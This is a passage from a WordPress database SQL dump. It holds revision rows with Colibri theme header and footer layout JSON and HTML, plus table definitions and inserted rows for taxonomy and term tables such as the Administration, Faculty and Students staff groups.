}],\"id\":\"25-h13\",\"parentId\":\"25-h11\",\"partialId\":25,\"styleRef\":45,\"type\":\"header\"}],\"footer\":[{\"name\":\"hop-row\",\"props\":{\"layout\":{\"equalWidth\":false,\"horizontalGap\":0,\"verticalGap\":0,\"horizontalInnerGap\":0,\"verticalInnerGap\":0}},\"children\":[{\"name\":\"hop-column\",\"props\":{\"layout\":{\"horizontalInnerGap\":2,\"verticalInnerGap\":2}},\"id\":\"25-h17\",\"parentId\":\"25-h16\",\"partialId\":25,\"styleRef\":49,\"type\":\"header\"}],\"id\":\"25-h16\",\"parentId\":\"25-h11\",\"partialId\":25,\"styleRef\":48,\"type\":\"header\"}]},\"children\":[{\"name\":\"hop-accordion-menu\",\"props\":{\"_isOffcanvasMenu\":true},\"id\":\"25-h12\",\"parentId\":\"25-h11\",\"partialId\":25,\"styleRef\":50,\"type\":\"header\"}],\"id\":\"25-h11\",\"parentId\":\"25-h10\",\"partialId\":25,\"styleRef\":44,\"type\":\"header\"}],\"id\":\"25-h10\",\"parentId\":\"25-h9\",\"partialId\":25,\"styleRef\":43,\"type\":\"header\"}],\"props\":{\"wordpressThemeLocation\":{\"id\":\"header-menu\",\"label\":\"Header primary menu\",\"priority\":1}},\"parentId\":\"25-h8\",\"index\":1,\"id\":\"25-h9\",\"partialId\":25,\"styleRef\":42,\"type\":\"header\"}],\"id\":\"25-h8\",\"parentId\":\"25-h3\",\"partialId\":25,\"styleRef\":41,\"type\":\"header\"}],\"id\":\"25-h3\",\"parentId\":\"25-h2\",\"partialId\":25,\"styleRef\":36,\"type\":\"header\"}],\"parentId\":\"25-h1\",\"id\":\"25-h2\",\"partialId\":25,\"styleRef\":35,\"type\":\"header\",\"slots\":{\"topBar\":[{\"name\":\"hop-top-bar\",\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"75\",\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-icon-list\",\"props\":{\"iconList\":[{\"title\":\"List\",\"link\":{\"value\":\"http:\\/\\/maps.google.com\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"Location, State, Country\",\"allIcons\":false,\"icon\":\"font-awesome\\/map-marker\",\"type\":\"svg\"},{\"title\":\"List\",\"link\":{\"value\":\"http:\\/\\/twitter.com\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"(000) 123 12345\",\"allIcons\":false,\"icon\":\"font-awesome\\/phone-square\",\"type\":\"svg\"},{\"title\":\"List\",\"link\":{\"value\":\"http:\\/\\/maps.google.com\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"email@yoursite.com\",\"allIcons\":false,\"icon\":\"font-awesome\\/envelope\",\"type\":\"svg\"}]},\"styleRef\":54,\"slot\":null,\"parentId\":\"25-h20\",\"index\":0,\"id\":\"25-h21\",\"partialId\":25,\"type\":\"header\"}],\"id\":\"25-h20\",\"parentId\":\"25-h19\",\"partialId\":25,\"styleRef\":53,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"25\",\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"font-awesome\\/facebook-square\",\"type\":\"svg\",\"link\":{\"value\":\"#\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/twitter-square\",\"type\":\"svg\",\"link\":{\"value\":\"#\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/youtube-square\",\"type\":\"svg\",\"link\":{\"value\":\"#\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/vimeo-square\",\"type\":\"svg\",\"link\":{\"value\":\"#\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}}]},\"styleRef\":56,\"slot\":null,\"parentId\":\"25-h22\",\"index\":0,\"id\":\"25-h23\",\"partialId\":25,\"type\":\"header\"}],\"id\":\"25-h22\",\"parentId\":\"25-h19\",\"partialId\":25,\"styleRef\":55,\"type\":\"header\"}],\"id\":\"25-h19\",\"parentId\":\"25-h18\",\"partialId\":25,\"styleRef\":52,\"type\":\"header\"}],\"id\":\"25-h18\",\"parentId\":\"25-h2\",\"partialId\":25,\"styleRef\":51,\"type\":\"header\"}]}},{\"name\":\"hop-hero\",\"props\":{\"anchor\":false,\"name\":\"Hero\",\"attrs\":{\"id\":\"hero\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-page-title\",\"id\":\"25-h27\",\"parentId\":\"25-h26\",\"partialId\":25,\"styleRef\":60,\"type\":\"header\"}],\"id\":\"25-h26\",\"parentId\":\"25-h25\",\"partialId\":25,\"styleRef\":59,\"type\":\"header\"},{\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"25-h28\",\"parentId\":\"25-h25\",\"partialId\":25,\"styleRef\":278,\"type\":\"header\"}],\"parentId\":\"25-h24\",\"index\":0,\"id\":\"25-h25\",\"partialId\":25,\"styleRef\":58,\"type\":\"header\"}],\"parentId\":\"25-h1\",\"type\":\"header\",\"id\":\"25-h24\",\"partialId\":25,\"styleRef\":57}],\"id\":\"25-h1\",\"type\":\"header\",\"ui\":{\"isSelected\":true,\"isHovered\":false},\"partialId\":25,\"styleRef\":34}','','','inherit','closed','closed','','26-revision-v1','','','2024-11-14 09:48:38','2024-11-14 14:48:38','',26,'https://gsudice.dataconn.net/?p=1879',0,'revision','',0),(1880,1,'2024-11-14 09:48:38','2024-11-14 14:48:38','<div data-colibri-id=\"25-h1\" class=\"page-header style-34 style-local-25-h1 position-relative\">\n  <!---->\n  <div data-colibri-navigation-overlap=\"true\" role=\"banner\" class=\"h-navigation_outer h-navigation_overlap style-35-outer style-local-25-h2-outer\">\n    <!---->\n    <div id=\"navigation\" data-colibri-component=\"navigation\" data-colibri-id=\"25-h2\" class=\"h-section h-navigation h-navigation d-flex style-35 style-local-25-h2\">\n      <!---->\n      <div class=\"h-section-grid-container h-section-fluid-container\">\n        <div data-nav-normal=\"\">\n          <div data-colibri-id=\"25-h3\" class=\"h-row-container h-section-boxed-container gutters-row-lg-0 gutters-row-md-0 gutters-row-2 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-2 style-36 style-local-25-h3 position-relative\">\n            <!---->\n            <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-2 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-2\">\n              <!---->\n              <div class=\"h-column h-column-container d-flex h-col-none style-37-outer style-local-25-h4-outer\">\n                <div data-colibri-id=\"25-h4\" data-placeholder-provider=\"navigation-logo\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-37 style-local-25-h4 position-relative\">\n                  <!---->\n                  <!---->\n                  <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-center align-self-md-center align-self-center\">\n                    <!---->\n                    <div data-colibri-id=\"25-h5\" class=\"d-flex align-items-center text-lg-left text-md-left text-left justify-content-lg-start justify-content-md-start justify-content-start style-38 style-local-25-h5 position-relative h-element\">\n                      <!---->\n                      <a rel=\"home\" href=\"[colibri_home_url]\" h-use-smooth-scroll=\"true\" class=\"d-flex align-items-center\"><span class=\"h-logo__text h-logo__text_h logo-text d-inline-block style-38-text style-local-25-h5-text\">[colibri_site_title]</span></a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n              <div class=\"h-column h-column-container d-flex h-col-none style-39-outer style-local-25-h6-outer h-hide-sm\">\n                <div data-colibri-id=\"25-h6\" data-placeholder-provider=\"navigation-spacing\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-39 style-local-25-h6 h-hide-sm position-relative\">\n                  <!---->\n                  <!---->\n                  <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-center align-self-md-center align-self-center\">\n                    <!---->\n                    <div data-colibri-id=\"25-h7\" class=\"style-40 style-local-25-h7 position-relative h-element\">\n                      <!---->\n                    </div>\n                  </div>\n                </div>\n              </div>\n              <div class=\"h-column h-column-container d-flex h-col-none style-41-outer style-local-25-h8-outer\">\n                <div data-colibri-id=\"25-h8\" data-placeholder-provider=\"navigation-menu\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-41 style-local-25-h8 position-relative\">\n                  <!---->\n                  <!---->\n                  <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-center align-self-md-center align-self-center\">\n                    <!---->\n                    <div data-colibri-component=\"dropdown-menu\" role=\"navigation\" h-use-smooth-scroll-all=\"true\" data-colibri-id=\"25-h9\" class=\"h-menu h-global-transition-all h-ignore-global-body-typography has-offcanvas-tablet h-menu-horizontal h-dropdown-menu style-42 style-local-25-h9 position-relative h-element\">\n                      <!---->\n                      <div class=\"h-global-transition-all h-main-menu\">[colibri_print_menu id=\"header-menu\" classes=\"bordered-active-item bordered-active-item--bottom effect-borders-grow grow-from-center\" show_shopping_cart=\"0\" depth=\"0\"]</div>\n                      <div data-colibri-id=\"25-h10\" class=\"h-mobile-menu h-global-transition-disable style-43 style-local-25-h10 position-relative h-element\">\n                        <!---->\n                        <a data-click-outside=\"true\" data-target=\"#offcanvas-wrapper-25-h10\" data-target-id=\"offcanvas-wrapper-25-h10\" data-offcanvas-overlay-id=\"offcanvas-overlay-25-h10\" href=\"#\" data-colibri-component=\"offcanvas\" data-direction=\"right\"\n                          data-push=\"false\" title=\"Menu\" class=\"h-hamburger-button\">\n                          <div class=\"icon-container h-hamburger-icon\">\n                            <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                              <!--Icon by Font Awesome (https://fontawesome.com)-->\n                              <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"bars\" viewBox=\"0 0 1536 1896.0833\">\n                                <path d=\"M1536 1344v128q0 26-19 45t-45 19H64q-26 0-45-19t-19-45v-128q0-26 19-45t45-19h1408q26 0 45 19t19 45zm0-512v128q0 26-19 45t-45 19H64q-26 0-45-19T0 960V832q0-26 19-45t45-19h1408q26 0 45 19t19 45zm0-512v128q0 26-19 45t-45 19H64q-26 0-45-19T0 448V320q0-26 19-45t45-19h1408q26 0 45 19t19 45z\"></path>\n                              </svg>\n                            </div>\n                          </div>\n                        </a>\n                        <div id=\"offcanvas-wrapper-25-h10\" class=\"h-offcanvas-panel offcanvas offcanvas-right hide force-hide style-43-offscreen style-local-25-h10-offscreen\">\n                          <div data-colibri-id=\"25-h11\" class=\"d-flex flex-column h-offscreen-panel style-44 style-local-25-h11 position-relative h-element\">\n                            <!---->\n                            <div class=\"offscreen-header h-ui-empty-state-container\">\n                              <div data-colibri-id=\"25-h13\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-45 style-local-25-h13 position-relative\">\n                                <!---->\n                                <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n                                  <!---->\n                                  <div class=\"h-column h-column-container d-flex h-col-lg-6 h-col-md-6 h-col-12 style-46-outer style-local-25-h14-outer\">\n                                    <div data-colibri-id=\"25-h14\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-46 style-local-25-h14 position-relative\">\n                                      <!---->\n                                      <!---->\n                                      <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                                        <!---->\n                                        <div data-colibri-id=\"25-h15\" class=\"d-flex align-items-center text-lg-center text-md-center text-center justify-content-lg-center justify-content-md-center justify-content-center style-47 style-local-25-h15 position-relative h-element\">\n                                          <!---->\n                                          <a rel=\"home\" href=\"[colibri_home_url]\" h-use-smooth-scroll=\"true\" class=\"d-flex align-items-center\"><span class=\"h-logo__text h-logo__text_h logo-text d-inline-block style-47-text style-local-25-h15-text\">[colibri_site_title]</span></a>\n                                        </div>\n                                      </div>\n                                    </div>\n                                  </div>\n                                </div>\n                              </div>\n                            </div>\n                            <div class=\"offscreen-content\">\n                              <!---->\n                              <div data-colibri-component=\"accordion-menu\" role=\"navigation\" h-use-smooth-scroll-all=\"true\" data-colibri-id=\"25-h12\" class=\"h-menu h-global-transition-all h-ignore-global-body-typography h-mobile-menu h-menu-accordion style-50 style-local-25-h12 position-relative h-element\">\n                                <!---->\n                                <div class=\"h-global-transition-all h-mobile-menu\">[colibri_print_menu id=\"header-menu\" classes=\"none \" show_shopping_cart=\"0\" depth=\"0\"]</div>\n                              </div>\n                            </div>\n                            <div class=\"offscreen-footer h-ui-empty-state-container\">\n                              <div data-colibri-id=\"25-h16\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-48 style-local-25-h16 position-relative\">\n                                <!---->\n                                <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n                                  <!---->\n                                  <div class=\"h-column h-column-container d-flex h-col-lg-6 h-col-md-6 h-col-12 style-49-outer style-local-25-h17-outer\">\n                                    <div data-colibri-id=\"25-h17\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-49 style-local-25-h17 position-relative\">\n                                      <!---->\n                                      <!---->\n                                      <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                                        <!---->\n                                      </div>\n                                    </div>\n                                  </div>\n                                </div>\n                              </div>\n                            </div>\n                          </div>\n                        </div>\n                        <div id=\"offcanvas-overlay-25-h10\" class=\"offscreen-overlay style-43-offscreenOverlay style-local-25-h10-offscreenOverlay\"></div>\n                      </div>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n        <div data-nav-sticky=\"\" style=\"display: none;\"></div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-id=\"25-h24\" id=\"hero\" class=\"h-section h-hero d-flex align-items-lg-center align-items-md-center align-items-center style-57 style-local-25-h24 position-relative\">\n    <!---->\n    <!---->\n    <div style=\"height: 70px; bottom: calc(0px);\" class=\"h-separator\">\n      <svg style=\"fill:#f6f8fa;transform:rotateX(180deg);\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1000 100\" preserveAspectRatio=\"none\">\n        <g opacity=\"0.33\">\n          <path d=\"M385.42,52.92c-11.63,4.22-23.18,9-34.52,14.38-103.18,49-91.83-33.55-148.36-.49,50.13,17.35,121.87,64.84,270.46.49,11-4.7,64.52-25.43,118-41.8-4-.52-8.45-.95-13.41-1.28C507.83,41.64,455.4,71.84,385.42,52.92Z\" transform=\"translate(0 0)\" style=\"isolation:isolate\"></path>\n          <path d=\"M0,59.7S48.08,103,116.06,83.43C54.25,76.6,0,39.8,0,39.8Z\" transform=\"translate(0 0)\" style=\"isolation:isolate\"></path>\n          <path d=\"M916.4,48.1c-55.76,5.45-76.83,2-111.28-7.81-3.09,1.4-6.07,2.81-9,4.22,13.93,8.57,25.54,16.74,33.15,22.39,13,9.8,43,25.4,75.8,22.1S1000,59.7,1000,59.7V36.5s-6.87-4.5-21.48-9.06C966,36.56,946.56,45.15,916.4,48.1Z\" transform=\"translate(0 0)\" style=\"isolation:isolate\"></path>\n        </g>\n        <g opacity=\"0.66\">\n          <path d=\"M771.65,30.49,766.1,28.9c-55-15.81-99.84-18-138.66-13.76a368.79,368.79,0,0,0-49.81,9.08c5,.33,9.44.76,13.41,1.28a89.13,89.13,0,0,1,13.86,2.7C656.8,44.1,688.5,67.3,734,67.3c19.82,0,38-11.12,62.15-22.79,2.9-1.41,5.88-2.82,9-4.22C795.39,37.52,784.59,34.23,771.65,30.49Z\"\n            transform=\"translate(0 0)\"></path>\n          <path d=\"M371,48.4C242,1.8,242,5.4,184.8,20.6,128,35.8,132.3,44.9,89.9,52.5,28.6,63.7,0,0,0,0V39.8S54.25,76.6,116.06,83.43c28.46,3.15,58.53-.05,85.64-16.13l.84-.49c56.53-33.06,45.18,49.44,148.36.49,11.34-5.38,22.89-10.16,34.52-14.38Q378.34,51,371,48.4Z\"\n            transform=\"translate(0 0)\"></path>\n          <path d=\"M978.52,27.44C993.13,32,1000,36.5,1000,36.5V0S996.54,14.27,978.52,27.44Z\" transform=\"translate(0 0)\"></path>\n        </g>\n        <path d=\"M0,0S28.6,63.7,89.9,52.5c42.4-7.6,38.1-16.7,94.9-31.9C242,5.4,242,1.8,371,48.4q7.33,2.61,14.42,4.52c70,18.92,122.41-11.28,192.21-28.7a368.79,368.79,0,0,1,49.81-9.08c38.82-4.21,83.68-2.05,138.66,13.76l5.55,1.59c12.94,3.74,23.74,7,33.47,9.8,34.45,9.83,55.52,13.26,111.28,7.81,30.16-3,49.63-11.54,62.12-20.66C996.54,14.27,1000,0,1000,0Z\"\n          transform=\"translate(0 0)\"></path>\n      </svg>\n    </div>\n    <div class=\"h-section-grid-container h-navigation-padding h-section-boxed-container\">\n      <!---->\n      <div data-colibri-id=\"25-h25\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-58 style-local-25-h25 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-59-outer style-local-25-h26-outer\">\n            <div data-colibri-id=\"25-h26\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-59 style-local-25-h26 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"25-h27\" class=\"page-title style-60 style-local-25-h27 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-page-title__outer style-60-outer style-local-25-h27-outer\">\n                    <div class=\"h-global-transition-all\">[colibri_page_title tag=\"h1\"]</div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <!---->\n        </div>\n      </div>\n    </div>\n  </div>\n</div>','header_post','','inherit','closed','closed','','25-revision-v1','','','2024-11-14 09:48:38','2024-11-14 14:48:38','',25,'https://gsudice.dataconn.net/?p=1880',0,'revision','',0),(1881,1,'2024-11-14 09:48:38','2024-11-14 14:48:38','{\"name\":\"hop-footer\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Footers\",\"attrs\":{\"id\":\"Footers\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":100,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-copyright\",\"slot\":null,\"parentId\":\"28-f4\",\"index\":0,\"id\":\"28-f5\",\"partialId\":28,\"styleRef\":270,\"type\":\"footer\"}],\"id\":\"28-f4\",\"parentId\":\"28-f3\",\"partialId\":28,\"styleRef\":269,\"type\":\"footer\"}],\"parentId\":\"28-f2\",\"index\":0,\"id\":\"28-f3\",\"partialId\":28,\"styleRef\":268,\"type\":\"footer\"}],\"id\":\"28-f2\",\"parentId\":\"28-f1\",\"partialId\":28,\"styleRef\":267,\"type\":\"footer\"}],\"id\":\"28-f1\",\"ui\":{\"isSelected\":false,\"isHovered\":false},\"type\":\"footer\",\"partialId\":28,\"styleRef\":266}','','','inherit','closed','closed','','29-revision-v1','','','2024-11-14 09:48:38','2024-11-14 14:48:38','',29,'https://gsudice.dataconn.net/?p=1881',0,'revision','',0),(1882,1,'2024-11-14 09:48:38','2024-11-14 14:48:38','<div data-enabled=\"true\" data-colibri-component=\"footer-parallax\" data-colibri-id=\"28-f1\" class=\"page-footer style-266 style-local-28-f1 position-relative\">\n  <!---->\n  <div data-colibri-component=\"section\" data-colibri-id=\"28-f2\" id=\"Footers\" class=\"h-section h-section-global-spacing d-flex align-items-lg-end align-items-md-end align-items-end style-267 style-local-28-f2 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <!---->\n      <div data-colibri-id=\"28-f3\" class=\"h-row-container gutters-row-lg-1 gutters-row-md-1 gutters-row-2 gutters-row-v-lg-1 gutters-row-v-md-1 gutters-row-v-2 style-268 style-local-28-f3 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-1 gutters-col-md-1 gutters-col-2 gutters-col-v-lg-1 gutters-col-v-md-1 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-269-outer style-local-28-f4-outer\">\n            <div data-colibri-id=\"28-f4\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-1 h-px-md-1 h-px-2 v-inner-lg-1 v-inner-md-1 v-inner-2 style-269 style-local-28-f4 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"28-f5\" class=\"style-270 style-local-28-f5 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-global-transition-all\">[colibri_copyright]© {year} {site-name}. Created for free using WordPress and\n                    <a target=\"_blank\" href=\"https://colibriwp.com\" rel=\"noopener\">Colibri</a>[/colibri_copyright]</div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n</div>','footer_post','','inherit','closed','closed','','28-revision-v1','','','2024-11-14 09:48:38','2024-11-14 14:48:38','',28,'https://gsudice.dataconn.net/?p=1882',0,'revision','',0);
/*!40000 ALTER TABLE `wp_posts` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_smush_dir_images`
--

DROP TABLE IF EXISTS `wp_smush_dir_images`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_smush_dir_images` (
  `id` mediumint(9) NOT NULL AUTO_INCREMENT,
  `path` text NOT NULL,
  `path_hash` char(32) DEFAULT NULL,
  `resize` varchar(55) DEFAULT NULL,
  `lossy` varchar(55) DEFAULT NULL,
  `error` varchar(55) DEFAULT NULL,
  `image_size` int(10) unsigned DEFAULT NULL,
  `orig_size` int(10) unsigned DEFAULT NULL,
  `file_time` int(10) unsigned DEFAULT NULL,
  `last_scan` timestamp NULL DEFAULT '0000-00-00 00:00:00',
  `meta` text DEFAULT NULL,
  UNIQUE KEY `id` (`id`),
  UNIQUE KEY `path_hash` (`path_hash`),
  KEY `image_size` (`image_size`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_smush_dir_images`
--

LOCK TABLES `wp_smush_dir_images` WRITE;
/*!40000 ALTER TABLE `wp_smush_dir_images` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_smush_dir_images` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_term_relationships`
--

DROP TABLE IF EXISTS `wp_term_relationships`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_term_relationships` (
  `object_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `term_taxonomy_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `term_order` int(11) NOT NULL DEFAULT 0,
  PRIMARY KEY (`object_id`,`term_taxonomy_id`),
  KEY `term_taxonomy_id` (`term_taxonomy_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_term_relationships`
--

LOCK TABLES `wp_term_relationships` WRITE;
/*!40000 ALTER TABLE `wp_term_relationships` DISABLE KEYS */;
INSERT INTO `wp_term_relationships` VALUES (6,2,0),(8,2,0),(8,3,0),(9,2,0),(9,4,0),(123,6,0),(138,5,0),(183,5,0),(186,5,0),(243,12,0),(416,14,0),(619,5,0),(1426,5,0),(1576,5,0);
/*!40000 ALTER TABLE `wp_term_relationships` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_term_taxonomy`
--

DROP TABLE IF EXISTS `wp_term_taxonomy`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_term_taxonomy` (
  `term_taxonomy_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `term_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `taxonomy` varchar(32) NOT NULL DEFAULT '',
  `description` longtext NOT NULL,
  `parent` bigint(20) unsigned NOT NULL DEFAULT 0,
  `count` bigint(20) NOT NULL DEFAULT 0,
  PRIMARY KEY (`term_taxonomy_id`),
  UNIQUE KEY `term_id_taxonomy` (`term_id`,`taxonomy`),
  KEY `taxonomy` (`taxonomy`)
) ENGINE=InnoDB AUTO_INCREMENT=17 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_term_taxonomy`
--

LOCK TABLES `wp_term_taxonomy` WRITE;
/*!40000 ALTER TABLE `wp_term_taxonomy` DISABLE KEYS */;
INSERT INTO `wp_term_taxonomy` VALUES (1,1,'category','',0,0),(2,2,'wp_theme','',0,3),(3,3,'wp_template_part_area','',0,1),(4,4,'wp_template_part_area','',0,1),(5,5,'nav_menu','',0,6),(6,6,'wp_theme','',0,1),(12,12,'staff-member-group','',0,0),(13,13,'staff-member-group','',0,0),(14,14,'staff-member-group','',0,0);
/*!40000 ALTER TABLE `wp_term_taxonomy` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_termmeta`
--

DROP TABLE IF EXISTS `wp_termmeta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_termmeta` (
  `meta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `term_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `meta_key` varchar(255) DEFAULT NULL,
  `meta_value` longtext DEFAULT NULL,
  PRIMARY KEY (`meta_id`),
  KEY `term_id` (`term_id`),
  KEY `meta_key` (`meta_key`(191))
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_termmeta`
--

LOCK TABLES `wp_termmeta` WRITE;
/*!40000 ALTER TABLE `wp_termmeta` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_termmeta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_terms`
--

DROP TABLE IF EXISTS `wp_terms`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_terms` (
  `term_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `name` varchar(200) NOT NULL DEFAULT '',
  `slug` varchar(200) NOT NULL DEFAULT '',
  `term_group` bigint(10) NOT NULL DEFAULT 0,
  PRIMARY KEY (`term_id`),
  KEY `slug` (`slug`(191)),
  KEY `name` (`name`(191))
) ENGINE=InnoDB AUTO_INCREMENT=17 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_terms`
--

LOCK TABLES `wp_terms` WRITE;
/*!40000 ALTER TABLE `wp_terms` DISABLE KEYS */;
INSERT INTO `wp_terms` VALUES (1,'Uncategorized','uncategorized',0),(2,'bricksy','bricksy',0),(3,'header','header',0),(4,'footer','footer',0),(5,'Header Menu','header-menu',0),(6,'colibri-wp','colibri-wp',0),(12,'Administration','administration',0),(13,'Faculty','faculty',0),(14,'Students','students',0);
/*!40000 ALTER TABLE `wp_terms` ENABLE KEYS */;
UNLOCK TABLES;

--
